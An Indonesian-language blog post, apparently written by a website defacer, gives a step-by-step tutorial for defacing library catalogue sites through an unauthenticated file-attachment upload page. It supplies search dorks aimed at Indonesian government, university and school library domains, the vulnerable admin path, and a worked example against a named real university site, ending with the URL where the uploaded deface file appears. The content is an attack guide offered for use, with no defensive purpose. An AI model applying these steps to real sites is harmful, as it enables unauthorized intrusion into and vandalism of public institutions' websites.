Cara Deface Poc File Attachment Upload Repository

Assalamu'alaikum.wr.wb 

Come back with me, siapa lagi kalo bukan orang tergans di +62. Oke kali ini saya akan share materi tentang Deface Poc File Attachment Upload Repository. 

Bahan-bahan :
Dork :

- pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id

(kembangin lagi yah asw:v) 

Exploit :

admin/modules/bibliography/pop_attach.php

Script Deface extensi (.txt) 

Pertama tama dorking dulu seperti biasa. Ini target saya

http://katalog.widyatama.ac.id/

Langsung aja kasih Exploit dibelakang Web target 

http://katalog.widyatama.ac.id/admin/modules/bibliography/pop_attach.php

Nahh kalo vuln, akan langsung muncul tempat upload file/scdeface

Isi kolom bagian title kata-kata nya terserah kalian dan pilih file/script defece.txt kalian. 

Dan kalau sudah, tinggal akses script Deface kalian dengan cara menambahkan /repository/scdeface.txt dibelakang Web target 

http://katalog.widyatama.ac.id/repository/ZZ.txt

Yaa seperti itu. Maka akan tampil hasil deface kalian. Segitu aja materi dari saya, semoga bermanfaat. Kurang lebihnya mohon maaf🙏 

• 
  

Related Posts:

Tweet